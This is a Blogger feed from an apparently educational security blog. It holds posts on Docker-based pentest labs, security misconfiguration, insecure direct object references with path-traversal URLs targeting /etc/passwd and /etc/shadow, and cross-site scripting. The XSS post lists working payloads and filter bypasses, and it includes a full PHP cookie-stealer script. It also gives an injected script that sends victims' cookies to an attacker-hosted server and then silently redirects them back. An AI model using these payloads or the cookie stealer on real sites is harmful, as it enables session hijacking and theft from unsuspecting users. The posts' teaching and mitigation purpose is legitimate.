tag:blogger.com,1999:blog-50757882146951907082024-02-19T08:31:16.667-08:00Secrets Finally RevealedHere you will find some secrets that are finally revealed :: You will love to enjoy reading and to learn some facts ::
****** WELCOME TO MY BLOG *******
Spread more and more so that others get to know ::
PPRASOON NIGAM (tracetheuntraceable)Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.comBlogger147125tag:blogger.com,1999:blog-5075788214695190708.post-73357447711731086382020-07-09T23:26:00.000-07:002020-07-09T23:26:38.984-07:00Network Pentesting with Mestasploitable | Metasploitable Docker installation in Kali Linux <div><br /></div><div>Hi, </div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/1XOVQ83LV6I" width="320" youtube-src-id="1XOVQ83LV6I"></iframe></div><div><br /></div><div><br /></div><div><br /></div><div>Please find the commands and description below </div><div><br /></div><div>Installation of docker in Kali linux </div><div>Search | Pull | Run Metasploitable2 image</div><div>Network pentesting </div><div><br /></div><div><b><u>Commands:</u></b></div><div><br /></div><div>Installation of Docker in Kali Linux (Fresh Installation)</div><div><br /></div><div>> sudo curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -</div><div>> sudo echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list</div><div>> sudo apt-get update</div><div>> sudo apt-get install docker-ce</div><div><br /></div><div><u><b>Metasploitable2 (Docker Pull image and Run Metasploitable2)</b></u></div><div><br /></div><div>> sudo docker search metasploitable2</div><div>> sudo docker pull tleemcjr/metasploitable2</div><div>> sudo docker run -it tleemcjr/metasploitable2</div><div><br /></div><div><u>In Metasploitable2 machine</u></div><div>> ifconfig</div><div><br /></div><div>Happy hacking and learning </div><div>Pprasoon</div><div>#Docker #Kali #KaliLinux #Metasploitable2 #Network Pentesting #Basic</div>Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-17524693959557792702020-07-05T06:59:00.002-07:002020-07-09T23:14:27.980-07:00Installation of Docker in Kali Linux and Basics.<div>Today, we will Install docker in Kali linux (Fresh Installation, Search for docker image, Pull docker image and Run|Stop docker image</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/ySUdJz3fw_U" width="320" youtube-src-id="ySUdJz3fw_U"></iframe></div><div><br /></div><div><br /></div><div>Follow the steps shown in video and below are the commands to be used</div><div><br /></div><div><u><b><font size="5">Installation of Docker in Kali linux </font></b></u></div><div><br /></div><div><b><u>Commands:</u></b> <b style="font-family: georgia;"> </b><i style="font-family: georgia;">(Here scerets are revealed)</i></div><div>Check Docker is present or not </div><div># sudo docker --version</div><div><br /></div><div># sudo curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -</div><div># sudo echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list</div><div># sudo apt-get update</div><div># sudo apt-get install docker-ce (for fresh installation)</div><div># sudo systemctl start docker</div><div># sudo systemctl enable docker</div><div># sudo docker --version </div><div><br /></div><div>Search docker image </div><div># sudo docker search xvwa</div><div><br /></div><div>Pull docker images in docker </div><div># sudo docker "image name"</div><div><br /></div><div>Check all docker Images installed</div><div># sudo docker image ls</div><div><br /></div><div>Run docker image </div><div># sudo docker run --name "anyname" -d -P "image name"</div><div>example: # sudo docker run --name xvwa -d -P tuxotron/xvwa</div><div><br /></div><div>To stop docker image or running process </div><div># sudo docker stop "name"</div><div><br /></div><div>To check running container id</div><div># sudo docker ps -aq</div><div><br /></div><div>To stop docker container id</div><div># sudo docker stop "container id"</div><div><br /></div><div>To rm docker container id </div><div># sudo docker rm "container id"</div><div><br /></div><div>To remove docker image</div><div># sudo docker rm "image name"</div><div><br /></div><div>Run Docker image outside the Kali Linux VM </div><div> check your ip with help of ifconfig and assign port </div><div><span style="white-space: pre;"> </span># sudo ifconfig</div><div><br /></div><div># sudo docker run --name xvwa -d -p (yourip):80:80 tuxotron/xvwa</div><div><br /></div><div>Happy Hacking !!!!</div><div>Pprasoon</div><div><br /></div><div>#Docker #KaliLinux #DockerInstallation #Dockerpullimage #DockerSerachImage</div>Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-23269198932144789702020-07-05T05:03:00.000-07:002020-07-05T06:35:42.070-07:00Web Pentetsing LAB in KALI LINUX with DOCKER<div><font face="georgia">Hi | Welcome | <b><u>Web Pentetsing in KALI LINUX with DOCKER</u></b> #Pprasoon</font></div><div><font face="georgia"><br /></font></div><div><font face="georgia">Today, we will create Web Application Penteting lab on Kali Linux with the help of Docker.</font></div><div><font face="georgia"><br /></font></div><div><font face="georgia"><i>Following can be used in VMWare player / Workstation | Virtual box</i></font></div><div><font face="georgia"><i><br /></i></font></div><div><font face="georgia"><i><br /></i></font></div><div><font face="georgia"><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/EN9ekQFHJtk" width="320" youtube-src-id="EN9ekQFHJtk"></iframe></div><i><br /></i></font></div><div><font face="georgia"><br /></font></div><div><font face="georgia">Follow the the steps show in video and below are the commands to be used</font></div><div><font face="georgia"><br /></font></div><div><font face="georgia"><u>Step 1:</u></font></div><div><font face="georgia"> <b> <u><font size="5">Installation of Docker in Kali linux </font></u></b></font></div><div><font face="georgia"><b>Commands: </b><i>(Here scerets are revealed)</i></font></div><div><font face="georgia">> sudo curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -</font></div><div><font face="georgia">> sudo echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list</font></div><div><font face="georgia">> sudo apt-get update</font></div><div><font face="georgia">> sudo apt-get install docker-ce (for fresh installation) </font></div><div><font face="georgia">> sudo systemctl start docker</font></div><div><font face="georgia">> sudo systemctl enable docker</font></div><div><font face="georgia">> sudo docker --version </font></div><div><font face="georgia"><br /></font></div><div><font face="georgia"><u>Step 2:</u></font></div><div><font face="georgia"> <b><u> Installing OWASP Broken Web Applications like </u></b></font></div><div><font face="georgia"><span style="white-space: pre;"> </span>bWAPP</font></div><div><font face="georgia"><span style="white-space: pre;"> </span>WebGoat 7.1</font></div><div><font face="georgia"><span style="white-space: pre;"> </span>WebGoat 8.0</font></div><div><font face="georgia"><span style="white-space: pre;"> </span>Damn Vulnerable Web App</font></div><div><font face="georgia"><span style="white-space: pre;"> </span>Mutillidae II</font></div><div><font face="georgia"><span style="white-space: pre;"> </span>OWASP Juice Shop</font></div><div><font face="georgia"><span style="white-space: pre;"> </span>WPScan Vulnerable Wordpress</font></div><div><font face="georgia"><span style="white-space: pre;"> </span>OpenDNS Security Ninjas</font></div><div><font face="georgia"><span style="white-space: pre;"> </span>Altoro Mutual</font></div><div><font face="georgia"><br /></font></div><div><font face="georgia"><b>Commands: </b><b> </b><i>(Here scerets are revealed)</i></font></div><div><font face="georgia">> su (to change user to root)</font></div><div><font face="georgia">> git clone https://github.com/eystsen/pentestlab.git</font></div><div><font face="georgia">> cd pentestlab</font></div><div><font face="georgia">> ./pentestLab.sh --help</font></div><div><font face="georgia">> ./pentestlab.sh list </font></div><div><font face="georgia">> </font><span style="font-family: georgia;">./pentestlab.sh start bwapp</span></div><div><font face="georgia"><br /></font></div><div><font face="georgia">First check image (Broken Web application running with help of docker) </font></div><div><font face="georgia"><b><u>Commands: </u></b></font><i style="font-family: georgia;">(Here scerets are revealed)</i></div><div><font face="georgia">> sudo docker ps</font></div><div><font face="georgia">> Copy the IP & port and paste in browser </font></div><div><font face="georgia"><br /></font></div><div><font face="georgia" size="5"><b>Running the above images in Kali with the help of docker (second method).</b></font></div><div><font face="georgia"><br /></font></div><div><font face="georgia">For Accessing the Broken Web applications outside the Kali Linux on host machine.</font></div><div><font face="georgia"><b><u>Commands</u>: </b></font><i style="font-family: georgia;">(Here scerets are revealed)</i></div><div><font face="georgia">> sudo docker images</font></div><div><font face="georgia">> sudo docker run --name bwapp -d -p <yourip>:80:80 raesene/bwapp</font></div><div><font face="georgia">> sudo docker ps</font></div><div><font face="georgia">To stop any above process </font></div><div><font face="georgia">> sudo docker stop "name"</font></div><div><font face="georgia"><br /></font></div><div><font face="georgia">PLEASE STOP YOUR ANITVIRS BEFORE CHECKING ON HOST (if required)</font></div><div><font face="georgia"><br /></font></div><div><font face="georgia">Configuration of BurpSuite in Firefox to Intercept the Request and Response </font></div><div><font face="georgia">> We will install foxyproxy addon</font></div><div><font face="georgia"><br /></font></div><div><font face="georgia">Happy Hacking !!!!</font></div><div><font face="georgia">Pprasoon</font></div><div><font face="georgia">#docker #kalilinux #Webpentesting #lab #virtualbox</font></div><div><br /></div>Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-89042084537267362872018-08-12T23:55:00.001-07:002018-08-12T23:56:20.943-07:00Security Misconfiguration<div dir="ltr" style="text-align: left;" trbidi="on">
Security Mis-configuration<br />
============================<br />
Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date<br />
<br />
Server configuration problems<br />
=================================<br />
> Unpatched security flaws in the server software<br />
> Server software flaws or misconfiguration that permit directory listing and directory traversal attacks<br />
> Unnecessary default, backup, or sample files, including scripts, applications, configuration files, and web pages<br />
> Improper file and directory permissions<br />
> Unnecessary services enabled, including content management and remote administration<br />
> Default accounts with their default passwords<br />
> Administrative or debugging functions that are enabled or accessible<br />
> Overly informative error messages (more details in the error handling section)<br />
> Misconfigured SSL certificates and encryption settings<br />
> Use of self-signed certificates to achieve authentication and man-in-the-middle protection<br />
> Use of default certificates<br />
> Improper authentication with external systems<br />
<br />
*****************<br />
All about => <a href="http://prasoon-nigam.blogspot.com/2018/08/insecure-direct-object-references.html" target="_blank">Insecure-direct-object-references</a><br />
Critical Vulnerability => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">Sql-injection-attack-and-defense-notes</a><br />
******************************************************<br />
<br />
<span style="color: red; font-size: large;">Mitigation </span><br />
==============<br />
** Do security hardening<br />
1) Configuring all security mechanisms<br />
2) Turning off all unused services<br />
3) Setting up roles, permissions, and accounts, including disabling all default accounts or changing their passwords<br />
4) Logging and alerts<br />
5) Monitoring the latest security vulnerabilities published<br />
6) Applying the latest security patches<br />
8) Updating the security configuration guideline<br />
9) Regular vulnerability scanning from both internal and external perspectives<br />
10) Regular internal reviews of the server’s security configuration as compared to your configuration guide<br />
11) Regular status reports to upper management documenting overall security posture<br />
<br />
Security Misconfiguration Cases<br />
===================================<br />
<span style="color: red;">Case 1 :</span><br />
Your application relies on a powerful framework like Struts or Spring. XSS flaws are found in these framework components you rely on. An update is released to fix these flaws but you don’t update your libraries. Until you do, attackers can easily find and exploit these flaws in your app.<br />
<br />
<span style="color: red;">Case 2 :</span><br />
The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over<br />
<br />
<span style="color: red;">Case 3 :</span><br />
Directory listing is not disabled on your server. Attacker discovers she can simply list directories to find any file. Attacker finds and downloads all your compiled Java classes, which attackers reverse engineers to get all your custom code. Attacker then finds a serious access control flaw in your application.<br />
<br />
<span style="color: red;">Case 4 :</span><br />
App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws. Attackers love the extra information error messages provide.<br />
<br />
*****************<br />
All about => <a href="http://prasoon-nigam.blogspot.com/2018/08/insecure-direct-object-references.html" target="_blank">Insecure-direct-object-references</a><br />
Critical Vulnerability => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">Sql-injection-attack-and-defense-notes</a><br />
******************************************************<br />
<br />
<b>Exploitation </b><br />
==============<br />
<span style="color: red;">Exploit 1:</span><br />
We can try out as many options as we can think of. All we need to find the URL of config file and we all know developers follow kind of naming convention for config files. It can be anything that is listed below. It is usually done by BRUTE force technique.<br />
<br />
web.config<br />
config<br />
appname.config<br />
conf<br />
<br />
<span style="color: red;">Exploit 2: </span><br />
Error Handling<br />
<br />
There are quite a few different ways to handle errors in ASP.NET MVC and Web API, whether through error handlers, filters and overrides, as well as granular application of error handling at the action or controller level. But, very likely you have experienced those edge cases where some exception has managed to bubble up past your custom control gates unhandled and you have experienced a error message<br />
<span style="color: red;"><br /></span>
<span style="color: red;">Exploit 3:</span><br />
URL redirection<br />
<br /></div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-85352590441942928802018-08-12T23:45:00.000-07:002018-08-12T23:58:52.543-07:00Insecure Direct Object References<div dir="ltr" style="text-align: left;" trbidi="on">
Insecure Direct Object References<br />
========================================<br />
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.<br />
<br />
Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.<br />
<br />
Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object.<br />
<br />
For Example<br />
http://example.com/app/accountInfo?acct=123<br />
<br />
******************<br />
All About Cross Site Scripting => <a href="http://prasoon-nigam.blogspot.com/2018/06/cross-site-scripting-xss-definition.html" target="_blank">Click on me :)</a><br />
Learn about => <a href="https://prasoon-nigam.blogspot.com/2018/08/security-misconfiguration.html" target="_blank">Security-misconfiguration</a><br />
Know about Critical Vulnerability => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">SQL Injection Click on me :)</a><br />
***********************************************************<br />
<br />
<b>Mitigation </b><br />
================<br />
1) Avoid exposing your private object references to users whenever possible, such as primary keys or filenames<br />
2) Validate any private object references extensively with an "accept known good" approach<br />
3) Verify authorization to all referenced objects<br />
<br />
<br />
Insecure Direct Object References cases<br />
=========================================<br />
<b><span style="color: red;">Case 1: </span></b><br />
The value of a parameter is used directly to retrieve a database record<br />
http://foo.bar/somepage?invoice=12345<br />
<br />
String query = "SELECT * FROM table WHERE cartID=" + cartID;<br />
<br />
<b><span style="color: red;">Case 2: </span></b><br />
Sometimes leads to Directory traversal or Path traversal<br />
Many file operations are intended to take place within a restricted directory. By using special elements such as ".." and "/" separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system. One of the most common special elements is the "../" sequence, which in most modern operating systems is interpreted as the parent directory of the current location. This is referred to as relative path traversal. Path traversal also covers the use of absolute pathnames such as "/usr/local/bin", which may also be useful in accessing unexpected files. This is referred to as absolute path traversal.<br />
In many programming languages, the injection of a null byte (the 0 or NUL) may allow an attacker to truncate a generated file name to widen the scope of attack. For example, the software may add ".txt" to any pathname, thus limiting the attacker to text files, but a null injection may effectively remove this restriction.<br />
<br />
../../../etc/passwd in part of linux<br />
<br />
<b>Directory Traversal</b><br />
<br />
Assume a web application allows for a file to be rendered to a user that is stored on the local machine. If the application isn't verifying what files should be accessed, an attacker can request other files on the file system and those will also be displayed.<br />
<br />
For instance, if the attacker notices the URL:<br />
<br />
http://misc-security.com/file.jsp?file=report.txt<br />
The attacker could modify the file parameter using a directory traversal attack. He modifies the URL to:<br />
<br />
http://misc-security.com/file.jsp?file=**../../../etc/shadow**<br />
Upon doing this the /etc/shadow file is returned and rendered by file.jsp demonstrating the page is susceptible to a directory traversal attack.<br />
<br />
******************<br />
All About Cross Site Scripting => <a href="http://prasoon-nigam.blogspot.com/2018/06/cross-site-scripting-xss-definition.html" target="_blank">Click on me :)</a><br />
Learn about => <a href="https://prasoon-nigam.blogspot.com/2018/08/security-misconfiguration.html" target="_blank">Security-misconfiguration</a><br />
<div>
**********************************************</div>
<br />
Exploitation<br />
===================<br />
IMP => https://www.exploit-db.com/exploits/35203/<br />
Exploiting Insecure Direct Object References, attackers can bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object ( i.e. by modifying the user account)<br />
<br />
<b><span style="color: red;">Exploit 1 :</span></b><br />
Is there is URL is redirecting on parameter ID in a URL string to access the information of other users)<br />
http://foo.bar/somepage?invoice=12345<br />
attacker can change the ID by predicting and and may redirect to another person account<br />
<br />
<br />
<b><span style="color: red;">Exploit 2 :</span></b><br />
IF something is coming in directory<br />
http://www.website.com/app/home/some=12312<br />
attacker can change the path and lead to LFI or path traversal or directory traversal<br />
for example<br />
http://www.website.com/app/home/some../../../etc/passwd<br />
<div>
<br /></div>
</div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-7365311029017978622018-06-18T07:54:00.003-07:002018-06-18T07:58:26.392-07:00Cross Site Scripting (XSS)<div dir="ltr" style="text-align: left;" trbidi="on">
Cross Site Scripting (XSS)<br />
===============================<br />
Definition => Cross-site Scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.<br />
<br />
The ability to inject code into the Web page generated, potential threats. An attacker can use XSS vulnerabilities to steal cookies, hijack accounts, execute ActiveX, execute Flash content, force you to download software, and take action on your hard disk and data.<br />
<br />
If you look more closely at the URL, it might actually exploit a vulnerability in your bank’s Web site, and look something like http://www.website.com/somepage?redirect=<script>alert(‘XSS’)</script>, where the use of the “redirect” parameter has been exploited to carry out the attack.<br />
<br />
**************************<br />
ALL about <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">SQL Injection and Defence</a><br />
What is <a href="http://prasoon-nigam.blogspot.com/2018/06/sessionall-about-session.html" target="_blank">Session</a><br />
Fun with computers => <a href="http://prasoon-nigam.blogspot.com/2011/06/how-to-make-folder-without-name-hidden.html" target="_blank">make-folder-without-name</a><br />
********************************************************<br />
<br />
XSS are 3 types<br />
==================<br />
<span style="color: red;"><u><b>Stored XSS (AKA Persistent or Type I)</b></u></span><br />
<span style="white-space: pre;"> </span>Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application without that data being made safe to render in the browser<br />
<br />
<span style="color: red;"><u><b>Reflected XSS (AKA Non-Persistent or Type II)</b></u></span><br />
<span style="white-space: pre;"> </span>Reflected XSS occurs when user input is immediately returned by a web application in an error message, search result, or any other response that includes some or all of the input provided by the user as part of the request, without that data being made safe to render in the browser, and without permanently storing the user provided data. In some cases, the user-provided data may never even leave the browser<br />
<br />
<span style="color: red;"><u><b>DOM Based XSS (AKA Type-0)</b></u></span><br />
<span style="white-space: pre;"> </span>DOM Based XSS is a form of XSS where the entire tainted data flow from source to sink takes place in the browser, i.e., the source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser. For example, the source (where malicious data is read) could be the URL of the page (e.g., document.location.href), or it could be an element of the HTML, and the sink is a sensitive method call that causes the execution of the malicious data (e.g., document.write)."<br />
<span style="white-space: pre;"> </span><br />
<span style="white-space: pre;"> </span>URL fragments (use to go something inside javascript | Something coming after # (hash) will not go to the server.<br />
<span style="white-space: pre;"> </span><br />
<span style="white-space: pre;"> </span><br />
<b>Attacks can be done by XSS</b><br />
==========================================<br />
> steal cookies (if they are not httpOnly)<br />
> retrieve the current page that the victim sees (as the victim user)<br />
> get the current URL of the victim<br />
> get the current referrer of the victim<br />
> Redirect to some other website<br />
> use the application cookies to gain access to the victim’s account<br />
> use possible CSRF (cross-site request forgery) vulnerabilities to make the victim perform unwanted actions in the application (e.g. add a new user)<br />
> inject malicious code into victim’s browser in order to exploit browser vulnerabilities<br />
> inject malicious Java applet, etc<br />
<br />
<b>Mitigation</b><br />
===============<br />
> Input validation both client and server side<br />
> Output encoding<br />
> White listing of words<br />
> OWASP escapi<br />
<br />
<b>JavaScript functionality</b><br />
==============================<br />
Window object<br />
Windows Object Properties<br />
1) window.locate<br />
<script>window.location.href="htts://www.google.co.in"</script><br />
<br />
2) document.body.innerHTML<br />
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script><br />
<br />
<br />
<b>XSS Cases</b><br />
===================<br />
<span style="color: red;">Case 1 :</span><br />
When there is no input validation and no output encoding use simple payload<br />
<script>alert(9)</script><br />
<svg/onload=alert(9)><br />
“><img src=x onerror=alert(1);><br />
<br />
<span style="color: red;">Case 2 :</span><br />
When value is going inside value Case (value= "something">) then try to put payload outside the double quotes<br />
"><script>alert(9)</script><br />
"><svg/onload=alert(9)><br />
<br />
<span style="color: red;">Case 3 :</span><br />
Try inject payload all the possible parameters, input boxes, dropdown list and hidden fields like<br />
input boxes<br />
search?q=<br />
value=' '<br />
drop down list value going in a parameter<br />
p=something (Hidden) (intercept with the burp-Suite)<br />
<br />
<span style="color: red;">Case 4 :</span><br />
when input box has limitation of alphabets to be written in it. Then right click on input box choose inspect element and change the number to max (so that u can write your payload)<br />
value = "><svg/onload=alert(9)><br />
<br />
<span style="color: red;">Case 5 :</span><br />
When you are getting output encoding inside the value tag then try to make payload using event handlers like onmouseover or onmouseclick<br />
Even see what all things are output encoded and escaped<br />
123" onmouseover="alert(9);<br />
asd" onmouseclick="alert(9);<br />
When server is escaping special characters like " or ' then payload be<br />
123 onmouseover=alert(9);<br />
<br />
<span style="color: red;">Case 6 : </span><br />
A thumb rule for href tag is that when any input is making a hyperlink just give him a simple payload<br />
javascript:alert(9)<br />
and you get the alert box<br />
hyper link payloads<br />
<a href="http:google.com" onclick=javascript:alert(9)> for always a link created<br />
www.google.com" onclick="confirm(9)"> href payload<br />
<br />
<span style="color: red;">Case 7 : </span><br />
When server is removing some words or alphabets the try to covert that words in base64 to bypass<br />
"><script>eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='));</script><br />
"><script>eval(alert(document.domain))</script><br />
<br />
<span style="color: red;">Case 8 :</span><br />
the words script, style and on aren't allowed, we have to think about something else this time. Apparently, it's possible to encode JavaScript as Base64 and make it execute as an iframe src.<br />
<br />
<iframe src="data:text/html;base64, .... base64 encoded HTML data ...."><br />
<br />
The HTML data we want to use is:<br />
<script>parent.alert(document.domain);</script><br />
<br />
parent. is needed because we want the alert to execute in the context of the parent's window. Encoding it as Base64 with the Character Encoding Calculator results in:<br />
<br />
PHNjcmlwdD5wYXJlbnQuYWxlcnQoZG9jdW1lbnQuZG9tYWluKTs8L3NjcmlwdD4<br />
<br />
The code that we will then put into the search box to finish the level is:<br />
<br />
"><iframe src="data:text/html;base64,PHNjcmlwdD5wYXJlbnQuYWxlcnQoZG9jdW1lbnQuZG9tYWluKTs8L3NjcmlwdD4="></iframe><br />
<br />
<br />
<span style="color: red;">Case 9 : </span><br />
Sometimes playing with html tags also leads to XSS<br />
for example :<br />
closing of a textarea and then putting a payload leads to stored XSS<br />
payload :<br />
</textarea><svg/onload=alert(9)><br />
<br />
<span style="color: red;">Case 10 :</span><br />
Sometimes putting a parameter and then a payload leads to reflective XSS<br />
for example<br />
we have an url http://www.website.com/forgotpassword<br />
change to<br />
url http://www.website.com/forgotpassword?aa=<script>alert(9)</script><br />
<br />
<span style="color: red;">Case 11 :</span><br />
When some input is going inside <script> </script> the we have to only put "-alert(9)-"<br />
it is vulnerable to XSS<br />
<br />
<span style="color: red;">Case 12 : </span>DOM BASED XSS<br />
For example:<br />
1)<br />
Assume that the URL<br />
http://www.vulnerable.site/welcome.html<br />
<br />
contains the following content:<br />
<HTML><br />
<TITLE>Welcome!</TITLE><br />
Hi<br />
<SCRIPT><br />
var pos=document.URL.indexOf("name=")+5;<br />
document.write(document.URL.substring(pos,document.URL.length));<br />
</SCRIPT><br />
<br />
Welcome to our system<br />
…</HTML><br />
This page will use the value from the "name" parameter in the following manner.<br />
http://www.vulnerable.site/welcome.html?name=Joe<br />
In this example, the JavaScript code embeds part of the document.URL (the page location) into the page, without any consideration for security. An attacker can abuse this by luring the client to click on a link such as<br />
http://www.vulnerable.site/welcome.html?name=<br />
<script>alert(document.cookie)</script><br />
<br />
2)<br />
<script><br />
<br />
var h = document.location.hash.substring(1);<br />
if (h && h != ""){<br />
var re = new RegExp(".+@.+");<br />
if (h.match(re)){<br />
<span style="white-space: pre;"> </span>document.getElementById("email").innerHTML+="("+h+")";<br />
<span style="white-space: pre;"> </span>}<br />
}<br />
</script><br />
payload = <img/src=x onerror=alert(9)>@gmail.com<br />
==============<br />
IMP :-<br />
Attribute's value field (with the " character escaped to &#34). Escaping ASCII characters can easily be done through this character encoding calculator: http://ha.ckers.org/xsscalc.html.<br />
============================================================================================================================<br />
<br />
<br />
**************************<br />
ALL about <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">SQL Injection and Defence</a><br />
What is <a href="http://prasoon-nigam.blogspot.com/2018/06/sessionall-about-session.html" target="_blank">Session</a><br />
Fun with computers => <a href="http://prasoon-nigam.blogspot.com/2011/06/how-to-make-folder-without-name-hidden.html" target="_blank">make-folder-without-name</a><br />
**************************************************<br />
<br />
<b>Exploitation With XSS</b><br />
=========================<br />
IMP => https://www.exploit-db.com/papers/13057/<br />
<span style="white-space: pre;"> </span> https://www.exploit-db.com/docs/15530.pdf<br />
<span style="white-space: pre;"> </span>http://internet.wonderhowto.com/how-to/hack-remote-internet-browser-with-xss-shell-261948/<br />
<br />
<b>Exploit 1 :</b><br />
Attacker can redirect victim to the malicious website<br />
payload :<br />
<script>alert("click ok to redirect");window.location.href="https://www.google.com"</script><br />
<br />
Attacker can make victim to download any malicious file to download<br />
payload<br />
<script>document.location="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe";</script><br />
<br />
<b>Exploit 2 :</b><br />
Attacker can steal cookies of the victim<br />
How to do it :<br />
In stealing cookies, there is a 3 step process<br />
attacker needs<br />
1)injected script<br />
2)cookies stealer<br />
3)log file<br />
<br />
Create an account on a server and create two files, log.txt and cookiestealer.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste following php code into your cookie stealer script (cookiestealer.php):<br />
<br />
cookiestealer code :<br />
<br />
<?php<br />
<br />
function GetIP()<br />
{<br />
<span style="white-space: pre;"> </span>if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))<br />
<span style="white-space: pre;"> </span>$ip = getenv("HTTP_CLIENT_IP");<br />
<span style="white-space: pre;"> </span>else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))<br />
<span style="white-space: pre;"> </span>$ip = getenv("HTTP_X_FORWARDED_FOR");<br />
<span style="white-space: pre;"> </span>else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))<br />
<span style="white-space: pre;"> </span>$ip = getenv("REMOTE_ADDR");<br />
<span style="white-space: pre;"> </span>else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))<br />
<span style="white-space: pre;"> </span>$ip = $_SERVER['REMOTE_ADDR'];<br />
<span style="white-space: pre;"> </span>else<br />
<span style="white-space: pre;"> </span>$ip = "unknown";<br />
<span style="white-space: pre;"> </span>return($ip);<br />
}<br />
<br />
function logData()<br />
{<br />
<span style="white-space: pre;"> </span>$ipLog="log.txt";<br />
<span style="white-space: pre;"> </span>$cookie = $_SERVER['QUERY_STRING'];<br />
<span style="white-space: pre;"> </span>$register_globals = (bool) ini_get('register_gobals');<br />
<span style="white-space: pre;"> </span>if ($register_globals) $ip = getenv('REMOTE_ADDR');<br />
<span style="white-space: pre;"> </span>else $ip = GetIP();<br />
<br />
<span style="white-space: pre;"> </span>$rem_port = $_SERVER['REMOTE_PORT'];<br />
<span style="white-space: pre;"> </span>$user_agent = $_SERVER['HTTP_USER_AGENT'];<br />
<span style="white-space: pre;"> </span>$rqst_method = $_SERVER['METHOD'];<br />
<span style="white-space: pre;"> </span>$rem_host = $_SERVER['REMOTE_HOST'];<br />
<span style="white-space: pre;"> </span>$referer = $_SERVER['HTTP_REFERER'];<br />
<span style="white-space: pre;"> </span>$date=date ("l dS of F Y h:i:s A");<br />
<span style="white-space: pre;"> </span>$log=fopen("$ipLog", "a+");<br />
<br />
<span style="white-space: pre;"> </span>if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))<br />
<span style="white-space: pre;"> </span>fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");<br />
<span style="white-space: pre;"> </span>else<br />
<span style="white-space: pre;"> </span>fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");<br />
<span style="white-space: pre;"> </span>fclose($log);<br />
}<br />
<br />
logData();<br />
<br />
?><br />
<br />
This script will record the cookies of every user that views it.<br />
<br />
Now find a XSS vulnerable page or parameter or search box and put the payload<br />
"><script language= "JavaScript">document.location="http://yoursite.com/cookiestealer.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script><br />
<br />
yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened.<br />
<br />
